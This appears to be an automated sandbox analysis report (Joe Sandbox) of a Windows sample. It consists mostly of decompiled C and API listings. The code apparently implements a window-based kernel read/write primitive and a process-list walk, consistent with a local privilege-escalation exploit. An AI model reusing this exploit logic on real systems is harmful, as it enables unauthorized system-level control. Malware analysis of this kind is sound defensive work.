                      0x0093ca40
                      0x0093ca45
                      0x0093ca50
                      0x0093ca5a
                      0x0093ca5c
                      0x0093ca6b
                      0x0093ca78
                      0x0093ca91
                      0x0093ca9d
                      0x0093caaf
                      0x0093cc21
                      0x0093cc26
                      0x0093cc29
                      0x0093cc36
                      0x0093cc40
                      0x0093cc4a
                      0x0093cc54
                      0x0093cc5e
                      0x0093cc68
                      0x0093cc70
                      0x0093cc7a
                      0x0093cc8d
                      0x00000000
                      0x0093cc93
                      0x0093cc93
                      0x0093cc99
                      0x0093cca0
                      0x0093ccb6
                      0x0093ccc1
                      0x0093ccc5
                      0x0093ccc7
                      0x0093cccf
                      0x0093ccd1
                      0x0093ccd1
                      0x0093ccdc
                      0x00000000
                      0x00000000
                      0x0093ccde
                      0x0093ccea
                      0x0093ccee
                      0x0093ccf0
                      0x0093ccf8
                      0x00000000
                      0x00000000
                      0x0093ccf8
                      0x00000000
                      0x0093ccea
                      0x0093ccd1
                      0x0093ccfa
                      0x0093ccfd
                      0x0093cd05
                      0x0093cd07
                      0x0093cd15
                      0x0093cd1f
                      0x0093cd1f
                      0x0093cd29
                      0x0093cd36
                      0x0093cd36
                      0x0093cab5
                      0x0093cabc
                      0x0093cae4
                      0x0093cae8
                      0x00000000
                      0x0093caea
                      0x0093caea
                      0x0093caed
                      0x0093caf2
                      0x0093cafa
                      0x0093cb46
                      0x00000000
                      0x0093cb4c
                      0x0093cb4c
                      0x00000000
                      0x0093cb4c
                      0x0093cafc
                      0x0093cafe
                      0x0093cb0f
                      0x0093cb20
                      0x0093cb31
                      0x00000000
                      0x0093cb37
                      0x0093cb37
                      0x00000000
                      0x0093cb37
                      0x0093cb22
                      0x0093cb22
                      0x00000000
                      0x0093cb22
                      0x0093cb11
                      0x0093cb11
                      0x00000000
                      0x0093cb11
                      0x0093cb00
                      0x0093cb00
                      0x00000000
                      0x0093cb00
                      0x0093cafe
                      0x0093cafa
                      0x0093cac7
                      0x0093cacb
                      0x0093cad5
                      0x0093cad7
                      0x0093cad7
                      0x0093cb56
                      0x0093cb56
                      0x0093cb5f
                      0x0093cb67
                      0x00000000
                      0x0093cb7a
                      0x0093cb7a
                      0x0093cb84
                      0x0093cb90
                      0x0093cb95
                      0x0093cba1
                      0x0093cba6
                      0x0093cbb2
                      0x0093cbb7
                      0x0093cbc3
                      0x0093cbcd
                      0x0093cbd2
                      0x0093cbde
                      0x0093cbe3
                      0x00000000
                      0x0093cbf1
                      0x0093cbf4
                      0x0093cc00
                      0x0093cc08
                      0x0093cc14
                      0x0093cc1c
                      0x00000000
                      0x0093cc1c
                      0x0093cbe3
                      0x0093cb67
                      0x0093cabc
                      0x0093ca7b
                      0x0093ca7b
                      0x0093ca8b
                      0x0093ca8b

                      APIs
                      • Sleep.KERNEL32(000000C8,?,00000000), ref: 0093CA5A
                      • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 0093CA64
                      • LoadLibraryA.KERNEL32(USER32.dll,?,00000000), ref: 0093CA70
                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 0093CAA7
                      • IsWow64Process.KERNEL32(000000FF,00000000,?,00000000), ref: 0093CB5F
                      • RegisterClassExW.USER32 ref: 0093CC84
                      • GetSystemMetrics.USER32 ref: 0093CC9C
                      • GetSystemMetrics.USER32 ref: 0093CCA5
                      • CreateThread.KERNEL32 ref: 0093CCBB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: MetricsSystem$ClassCreateHandleLibraryLoadModuleProcessRegisterSleepThreadVersionWow64
                      • String ID: 0$MyMainWnd$USER32.dll$ntdll.dll
                      • API String ID: 3039634143-1536395663
                      • Opcode ID: 4c84c8995d5845fb29ee7a97a589395b2c78357e6f27302f6d29e54da8762bd5
                      • Instruction ID: d39ed115c6c44f30877458e928602c393ed1ec9d83f30085e9be7ace789d118d
                      • Opcode Fuzzy Hash: 4c84c8995d5845fb29ee7a97a589395b2c78357e6f27302f6d29e54da8762bd5
                      • Instruction Fuzzy Hash: 0981ACB4A287489FDB20CF65EC46BAA7BF4E719315F000156E505FB2E0DBB49988EF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D538 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 139keyboardthreadsleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 379 93d538-93d53f 380 93d540-93d54b 379->380 381 93d551-93d576 380->381 382 93d70e-93d739 call 93161c 380->382 383 93d6fb-93d708 381->383 384 93d57c-93d58e CreateThread 381->384 383->380 383->382 386 93d593-93d59a 384->386 388 93d5a6-93d5a9 386->388 389 93d59c-93d5a4 Sleep 386->389 391 93d5af-93d5f0 CreateWindowExW 388->391 392 93d6dd-93d6f5 DestroyWindow * 2 TerminateThread 388->392 389->386 389->388 393 93d5f6-93d682 GetWindowLongW SetWindowLongW call 9310c5 keybd_event * 4 Sleep 391->393 394 93d688-93d6bb DestroyWindow * 2 TerminateThread WaitForSingleObject 391->394 392->383 393->394 394->383 396 93d6bd-93d6cf 394->396 396->383 398 93d6d1-93d6db call 93c820 396->398 398->383
                      C-Code - Quality: 65%
                      			E0093D538() {
				intOrPtr _t5;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t46;
				void* _t52;
				void* _t53;
				void* _t56;
				struct _SECURITY_ATTRIBUTES* _t57;
				signed int _t60;

				while(1) {
					_t5 =  *0x944244; // 0xa
					if( *0x9580bc >= _t5) {
						break;
					}
					 *0x9580d4 = 0;
					 *0x9580d8 = 0;
					 *0x9580d0 = 0;
					if( *0x95807c != 0) {
						L13:
						 *0x9580bc =  *0x9580bc + 1;
						if( *0x95807c == 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					 *0x9580c0 = CreateThread(0, 0, E0093C970, 0, 0, 0);
					while( *0x9580d0 == 0) {
						_t57 =  &(_t57->nLength);
						Sleep(0x32);
						if(_t57 < 0x14) {
							continue;
						}
						break;
					}
					if(_t57 >= 0x14) {
						DestroyWindow( *0x9580d4);
						DestroyWindow( *0x9580d8);
						TerminateThread( *0x9580c0, 0xffffffff);
					} else {
						_t16 =  *0x94424c; // 0x1388
						_t18 =  *0x944248; // 0x1388
						 *0x9580d8 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t18 + 1, _t16 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
						if( *0x9580d8 != 0) {
							asm("adc edi, 0x0");
							asm("adc edi, 0x0");
							asm("adc edi, 0xffffffff");
							SetWindowLongW( *0x9580d8, 0xfffffff0, GetWindowLongW( *0x9580d8, 0xfffffff0) | 0x40000000);
							_push( *0x95808c);
							_push( *0x958088 +  *0x958064 + 3 - 0x28);
							_push(0xfffffff4);
							_push( *0x9580d8);
							_push( *0x9441ec);
							L009310C5();
							keybd_event(0x12, 0, 0, 0);
							keybd_event(0x1b, 0, 0, 0);
							keybd_event(0x1b, 0, 2, 0);
							keybd_event(0x12, 0, 2, 0);
							Sleep(0x64);
						}
						DestroyWindow( *0x9580d4);
						DestroyWindow( *0x9580d8);
						TerminateThread( *0x9580c0, 0xffffffff);
						WaitForSingleObject( *0x9580c0, 0xffffffff);
						if( *0x95807c == 0 &&  *((intOrPtr*)( *0x958084 +  *0x958064)) >= 0x4000000) {
							 *0x95807c = E0093C820();
						}
					}
					goto L13;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0x10));
				_pop(_t53);
				_pop(_t56);
				_pop(_t46);
				return E0093161C(_t46,  *(_t60 - 0x1c) ^ _t60, _t52, _t53, _t56);
			}












                      0x0093d540
                      0x0093d540
                      0x0093d54b
                      0x00000000
                      0x00000000
                      0x0093d551
                      0x0093d55b
                      0x0093d565
                      0x0093d576
                      0x0093d6fb
                      0x0093d6fb
                      0x0093d708
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d708
                      0x0093d57c
                      0x0093d58e
                      0x0093d593
                      0x0093d59c
                      0x0093d59f
                      0x0093d5a4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0093d5a4
                      0x0093d5a9
                      0x0093d6e3
                      0x0093d6eb
                      0x0093d6f5
                      0x0093d5af
                      0x0093d5bf
                      0x0093d5c6
                      0x0093d5e4
                      0x0093d5f0
                      0x0093d607
                      0x0093d60d
                      0x0093d616
                      0x0093d635
                      0x0093d63b
                      0x0093d63c
                      0x0093d63d
                      0x0093d644
                      0x0093d645
                      0x0093d64b
                      0x0093d65e
                      0x0093d668
                      0x0093d672
                      0x0093d67c
                      0x0093d680
                      0x0093d682
                      0x0093d68e
                      0x0093d696
                      0x0093d6a0
                      0x0093d6ae
                      0x0093d6bb
                      0x0093d6d6
                      0x0093d6d6
                      0x0093d6bb
                      0x00000000
                      0x0093d5a9
                      0x0093d721
                      0x0093d729
                      0x0093d72a
                      0x0093d72b
                      0x0093d739

                      APIs
                      • CreateThread.KERNEL32 ref: 0093D588
                      • Sleep.KERNEL32(00000032), ref: 0093D59F
                      • CreateWindowExW.USER32 ref: 0093D5DE
                      • GetWindowLongW.USER32(?,000000F0), ref: 0093D621
                      • SetWindowLongW.USER32 ref: 0093D635
                      • keybd_event.USER32 ref: 0093D65E
                      • keybd_event.USER32 ref: 0093D668
                      • keybd_event.USER32 ref: 0093D672
                      • keybd_event.USER32 ref: 0093D67C
                      • Sleep.KERNEL32(00000064), ref: 0093D680
                      • DestroyWindow.USER32(?), ref: 0093D68E
                      • DestroyWindow.USER32(?), ref: 0093D696
                      • TerminateThread.KERNEL32(?,000000FF), ref: 0093D6A0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0093D6AE
                      • DestroyWindow.USER32(?), ref: 0093D6E3
                      • DestroyWindow.USER32(?), ref: 0093D6EB
                      • TerminateThread.KERNEL32(?,000000FF), ref: 0093D6F5
                      • DestroyWindow.USER32(00000000,00000000), ref: 0093D716
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Destroy$keybd_event$Thread$CreateLongSleepTerminate$ObjectSingleWait
                      • String ID: MyMainWnd
                      • API String ID: 2733185211-188152914
                      • Opcode ID: da864e60af1605bda5e1c0f193f461a3dbcd2b38c61e84462d8bd7c7c91d0860
                      • Instruction ID: c4dc741d3834601bded08d50f1e087ffd5763ad6e68469e7ad5898a51615e9a3
                      • Opcode Fuzzy Hash: da864e60af1605bda5e1c0f193f461a3dbcd2b38c61e84462d8bd7c7c91d0860
                      • Instruction Fuzzy Hash: 03519171669310AFE7209B7AFC4AF973768F705726F100114F625AB2E0CBB46848EF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093C4E0 Relevance: 21.2, APIs: 14, Instructions: 167stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 93%
                      			E0093C4E0(long _a4, short _a8) {
				signed int _v8;
				short _v1008;
				intOrPtr _v1012;
				signed int _v1016;
				long _v1020;
				intOrPtr _v1024;
				long _v1028;
				intOrPtr _v1032;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				intOrPtr _t49;
				int _t55;
				int _t57;
				intOrPtr _t58;
				struct HWND__* _t66;
				intOrPtr _t78;
				intOrPtr _t79;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t120;
				signed int _t124;
				signed int _t125;
				long _t128;
				void* _t131;
				intOrPtr _t132;
				signed int _t133;

				_t47 =  *0x943050; // 0xce43520a
				_v8 = _t47 ^ _t133;
				_t49 =  *0x957ff0; // 0x0
				_v1028 =  *((intOrPtr*)( *0x958014 + _t49));
				_v1012 = 0xffffffff;
				_v1024 = 0xffffffff;
				E00935A90( &_v1008, 0, 0x3e8);
				_v1008 = _a8;
				_t55 = lstrlenW( &_v1008);
				if(_t55 != 2) {
					_t101 = _t55 + _t55;
					_v1012 = _t101;
					 *((short*)(_t133 + _t101 - 0x3ec)) = 0x3333;
				}
				_t57 = lstrlenW( &_v1008);
				if(_t57 != 2) {
					_t132 = _t57 + _t57;
					_v1024 = _t132;
					 *((short*)(_t133 + _t132 - 0x3ec)) = 0x3333;
				}
				_t99 = 2;
				_t128 = _a4 + 4;
				_v1016 = 1;
				_v1020 = _t128;
				do {
					_t103 =  *0x958014;
					_t58 =  *0x957ff4; // 0x0
					_v1032 =  *((intOrPtr*)(_t103 + _t58 + 4));
					_t104 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t104 -  *0x95801c, _t128);
					_t66 = GetAncestor( *0x958010, 1);
					_t120 =  *0x957ff4; // 0x0
					_t121 = _t120 -  *0x95801c;
					SetWindowLongW( *0x958004,  *0x958018 + _t120 -  *0x95801c,  *(_t103 + _t58));
					_t124 = _v1016;
					_t99 = _t99 + 2;
					 *(_t133 + _t124 * 4 - 0x3ec) = _t66;
					_t125 = _t124 + 1;
					_t128 = _v1020 + 4;
					_v1016 = _t125;
					_v1020 = _t128;
				} while (lstrlenW( &_v1008) >= _t99 && _t99 < 0x1f4);
				if(_t125 != 0xfa) {
					_t110 =  *0x957ff0; // 0x0
					_t100 = SetWindowLongW;
					SetWindowLongW( *0x958004,  *0x958018 + _t110 -  *0x95801c, _a4);
					_t131 = SetWindowTextW;
					SetWindowTextW( *0x958010,  &_v1008);
					_t78 = _v1024;
					if(_t78 != 0xffffffff) {
						 *((short*)(_t133 + _t78 - 0x3ec)) = 0;
						SetWindowTextW( *0x958010,  &_v1008);
					}
					_t79 = _v1012;
					if(_t79 != 0xffffffff) {
						 *((short*)(_t133 + _t79 - 0x3ec)) = 0;
						SetWindowTextW( *0x958010,  &_v1008);
					}
					_t112 =  *0x957ff0; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t112 -  *0x95801c, _v1028);
					ShowWindow( *0x958010, 5);
					UpdateWindow( *0x958010);
					return E0093161C(_t100, _v8 ^ _t133, _t121, _t125, _t131);
				} else {
					return E0093161C(_t99, _v8 ^ _t133, _t121, _t125, _t128);
				}
			}




































                      0x0093c4e9
                      0x0093c4f0
                      0x0093c4f9
                      0x0093c509
                      0x0093c518
                      0x0093c522
                      0x0093c52c
                      0x0093c53d
                      0x0093c54a
                      0x0093c554
                      0x0093c556
                      0x0093c559
                      0x0093c55f
                      0x0093c55f
                      0x0093c56e
                      0x0093c573
                      0x0093c575
                      0x0093c578
                      0x0093c57e
                      0x0093c57e
                      0x0093c589
                      0x0093c58e
                      0x0093c591
                      0x0093c59b
                      0x0093c5a1
                      0x0093c5a1
                      0x0093c5a7
                      0x0093c5b4
                      0x0093c5bf
                      0x0093c5d5
                      0x0093c5e3
                      0x0093c5f1
                      0x0093c5f7
                      0x0093c60a
                      0x0093c610
                      0x0093c61d
                      0x0093c620
                      0x0093c627
                      0x0093c62e
                      0x0093c631
                      0x0093c637
                      0x0093c643
                      0x0093c659
                      0x0093c673
                      0x0093c67c
                      0x0093c692
                      0x0093c694
                      0x0093c6a7
                      0x0093c6a9
                      0x0093c6b2
                      0x0093c6b6
                      0x0093c6cb
                      0x0093c6cb
                      0x0093c6cd
                      0x0093c6d6
                      0x0093c6da
                      0x0093c6ef
                      0x0093c6ef
                      0x0093c6f6
                      0x0093c712
                      0x0093c71c
                      0x0093c728
                      0x0093c743
                      0x0093c65d
                      0x0093c66d
                      0x0093c66d

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Long$Textlstrlen$AncestorShowUpdate_memset
                      • String ID:
                      • API String ID: 2624496401-0
                      • Opcode ID: 3a57ebf7b0b7aecb2d71c08bea786358fcd2e136b3b27943c558d115f5c611f7
                      • Instruction ID: 3deff9c1181c6a79851d693aede049e8657d92f3e2eab585c98a8a17a6c47e0b
                      • Opcode Fuzzy Hash: 3a57ebf7b0b7aecb2d71c08bea786358fcd2e136b3b27943c558d115f5c611f7
                      • Instruction Fuzzy Hash: C2617571A242199FCB25CFA9DC85AAE73FCFB49311F0445A9E519E33D0CA30AE45AF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093B6E0 Relevance: 19.7, APIs: 13, Instructions: 201COMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0093B6E0() {
				long _v8;
				intOrPtr _v16;
				intOrPtr _t28;
				struct HWND__* _t36;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HWND__* _t51;
				intOrPtr _t57;
				struct HWND__* _t65;
				intOrPtr _t71;
				intOrPtr _t72;
				struct HWND__* _t80;
				long _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t129;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr _t148;

				E0093BEE0(E0093BEE0( *0x958020 +  *0x957ff8));
				_t148 = E0093BEE0(_t25);
				do {
					if( *0x95802c != 0) {
						_t94 =  *0x95802c;
					} else {
						_t94 = GetCurrentProcessId();
					}
					_t98 =  *0x958014;
					_t28 =  *0x957ff4; // 0x0
					_v8 =  *((intOrPtr*)(_t98 + _t28 + 4));
					_t99 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t99 -  *0x95801c,  *0x957ffc + _t148);
					_t36 = GetAncestor( *0x958010, 1);
					_t101 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t101 -  *0x95801c,  *(_t98 + _t28));
					_t42 =  *0x957ffc;
					_t140 = _t36 - _t42;
					_t103 =  *0x958014;
					_v8 = _t140;
					_t43 =  *0x957ff4; // 0x0
					_v16 =  *((intOrPtr*)(_t103 + _t43 + 4));
					_t104 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t104 -  *0x95801c, _t42 - 4 + _t140);
					_t51 = GetAncestor( *0x958010, 1);
					_t129 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t129 -  *0x95801c,  *(_t103 + _t43));
					_t148 = _v8;
				} while (_t51 != _t94);
				_t95 = _t148;
				_v8 =  *0x958000 + _t95;
				E0093BEE0( *0x958000 + _t95);
				do {
					_t110 =  *0x958014;
					_t57 =  *0x957ff4; // 0x0
					_v16 =  *((intOrPtr*)(_t110 + _t57 + 4));
					_t111 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t111 -  *0x95801c,  *0x957ffc + _t95);
					_t65 = GetAncestor( *0x958010, 1);
					_t113 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t113 -  *0x95801c,  *(_t110 + _t57));
					_t71 =  *0x957ffc;
					_t95 = _t65 - _t71;
					_t115 =  *0x958014;
					_t72 =  *0x957ff4; // 0x0
					_v16 =  *((intOrPtr*)(_t115 + _t72 + 4));
					_t116 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t116 -  *0x95801c, _t71 - 4 + _t95);
					_t80 = GetAncestor( *0x958010, 1);
					_t135 =  *0x957ff4; // 0x0
					SetWindowLongW( *0x958004,  *0x958018 + _t135 -  *0x95801c,  *(_t115 + _t72));
				} while (_t80 != 4);
				_t155 = E0093BEE0( *0x958000 + _t95);
				E0093C4E0((_t84 & 0xfffffff0) - 0x18, E0093BEE0((_t84 & 0xfffffff8) - 0x18) + 2);
				E0093C4E0(_v8, _t155);
				return 1;
			}































                      0x0093b6fd
                      0x0093b711
                      0x0093b713
                      0x0093b71a
                      0x0093b726
                      0x0093b71c
                      0x0093b722
                      0x0093b722
                      0x0093b72c
                      0x0093b732
                      0x0093b747
                      0x0093b74f
                      0x0093b765
                      0x0093b76f
                      0x0093b77c
                      0x0093b799
                      0x0093b79b
                      0x0093b7a0
                      0x0093b7a2
                      0x0093b7a8
                      0x0093b7ae
                      0x0093b7bd
                      0x0093b7c5
                      0x0093b7db
                      0x0093b7e5
                      0x0093b7f3
                      0x0093b812
                      0x0093b816
                      0x0093b816
                      0x0093b824
                      0x0093b829
                      0x0093b82c
                      0x0093b834
                      0x0093b834
                      0x0093b83a
                      0x0093b84f
                      0x0093b857
                      0x0093b86d
                      0x0093b877
                      0x0093b884
                      0x0093b89b
                      0x0093b89d
                      0x0093b8a2
                      0x0093b8a4
                      0x0093b8b3
                      0x0093b8c2
                      0x0093b8ca
                      0x0093b8e0
                      0x0093b8ea
                      0x0093b8f8
                      0x0093b917
                      0x0093b919
                      0x0093b92f
                      0x0093b94c
                      0x0093b955
                      0x0093b968

                      APIs
                        • Part of subcall function 0093BEE0: SetWindowLongW.USER32 ref: 0093BF1B
                        • Part of subcall function 0093BEE0: GetAncestor.USER32(?,00000001), ref: 0093BF29
                        • Part of subcall function 0093BEE0: SetWindowLongW.USER32 ref: 0093BF50
                      • GetCurrentProcessId.KERNEL32 ref: 0093B71C
                      • SetWindowLongW.USER32 ref: 0093B765
                      • GetAncestor.USER32(?,00000001), ref: 0093B76F
                      • SetWindowLongW.USER32 ref: 0093B799
                      • SetWindowLongW.USER32 ref: 0093B7DB
                      • GetAncestor.USER32(?,00000001), ref: 0093B7E5
                      • SetWindowLongW.USER32 ref: 0093B812
                      • SetWindowLongW.USER32 ref: 0093B86D
                      • GetAncestor.USER32(?,00000001), ref: 0093B877
                      • SetWindowLongW.USER32 ref: 0093B89B
                      • SetWindowLongW.USER32 ref: 0093B8E0
                      • GetAncestor.USER32(?,00000001), ref: 0093B8EA
                      • SetWindowLongW.USER32 ref: 0093B917
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: LongWindow$Ancestor$CurrentProcess
                      • String ID:
                      • API String ID: 754403503-0
                      • Opcode ID: 20ebee1d28cef62d8244d17bf9623b6dedf05b399ca089ca2ffd376ea5937971
                      • Instruction ID: ef995036673ec7928dc92e282481ef7cf73ee2a54ec426cb00cc02a21f77f741
                      • Opcode Fuzzy Hash: 20ebee1d28cef62d8244d17bf9623b6dedf05b399ca089ca2ffd376ea5937971
                      • Instruction Fuzzy Hash: FC717175A282009FC754DBBEED85EA773E9E78D316B044458E905E33A1DE30AD05EF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093BD80 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 445 93bd80-93bddf RegisterClassExW 446 93bde1-93bde7 445->446 447 93bde8-93be15 CreateWindowExW 445->447 448 93bed5-93bedd 447->448 449 93be1b-93be32 RegisterClassExW 447->449 449->448 450 93be38-93be5d CreateWindowExW 449->450 450->448 451 93be5f-93be6f call 93c750 * 2 450->451 451->448 456 93be71-93be73 451->456 456->448 457 93be75-93be82 456->457 458 93be84 457->458 459 93bebf-93bed4 DestroyWindow * 2 457->459 460 93be86-93be8d 458->460 461 93be97-93be9d 460->461 462 93be8f-93be95 460->462 461->460 464 93be9f-93beb4 DestroyWindow * 2 461->464 462->461 463 93beb5-93bebc 462->463 463->459
                      C-Code - Quality: 94%
                      			E0093BD80() {
				signed int _v8;
				struct _WNDCLASSEXW _v56;
				intOrPtr* _t31;
				struct HWND__* _t41;
				signed int _t45;
				unsigned int _t46;
				unsigned int _t47;
				struct HWND__* _t51;
				void* _t58;
				void* _t61;

				asm("xorps xmm0, xmm0");
				_v56.lpfnWndProc = DefWindowProcW;
				_v56.hInstance =  *0x958030;
				_v8 = 0;
				_v56.cbSize = 0x30;
				_v56.style = 0;
				_v56.cbClsExtra = 0;
				_v56.cbWndExtra = 0x118;
				asm("movdqu [ebp-0x1c], xmm0");
				_v56.lpszClassName = L"ExtraWnd1";
				_v56.hIconSm = 0;
				if(RegisterClassExW( &_v56) != 0) {
					_t41 = CreateWindowExW(0, L"ExtraWnd1", 0, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
					if(_t41 == 0) {
						L15:
						return 0;
					} else {
						_v56.lpszClassName = L"ExtraWnd2";
						_v56.cbWndExtra = 0x130;
						if(RegisterClassExW( &_v56) == 0) {
							goto L15;
						} else {
							_t51 = CreateWindowExW(0, L"ExtraWnd2", 0, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
							if(_t51 == 0) {
								goto L15;
							} else {
								_t58 = E0093C750(_t41);
								_t31 = E0093C750(_t51);
								if(_t58 == 0 || _t31 == 0) {
									goto L15;
								} else {
									_t46 =  *0x957fe8; // 0x0
									_t45 = 0;
									_t47 = _t46 >> 2;
									if(_t47 == 0) {
										L14:
										DestroyWindow(_t41);
										DestroyWindow(_t51);
										return _v8;
									} else {
										_t61 = _t58 - _t31;
										while( *((intOrPtr*)(_t61 + _t31)) != 0x118 ||  *_t31 != 0x130) {
											_t45 = _t45 + 1;
											_t31 = _t31 + 4;
											if(_t45 < _t47) {
												continue;
											} else {
												DestroyWindow(_t41);
												DestroyWindow(_t51);
												return _v8;
											}
											goto L16;
										}
										_v8 = _t45 * 4;
										goto L14;
									}
								}
							}
						}
					}
				} else {
					return 0;
				}
				L16:
			}













                      0x0093bd8b
                      0x0093bd8e
                      0x0093bd9d
                      0x0093bda4
                      0x0093bdab
                      0x0093bdb2
                      0x0093bdb9
                      0x0093bdc0
                      0x0093bdc7
                      0x0093bdcc
                      0x0093bdd3
                      0x0093bddf
                      0x0093be11
                      0x0093be15
                      0x0093bed5
                      0x0093bedd
                      0x0093be1b
                      0x0093be1e
                      0x0093be26
                      0x0093be32
                      0x00000000
                      0x0093be38
                      0x0093be59
                      0x0093be5d
                      0x00000000
                      0x0093be5f
                      0x0093be66
                      0x0093be68
                      0x0093be6f
                      0x00000000
                      0x0093be75
                      0x0093be75
                      0x0093be7b
                      0x0093be7d
                      0x0093be82
                      0x0093bebf
                      0x0093bec6
                      0x0093bec9
                      0x0093bed4
                      0x0093be84
                      0x0093be84
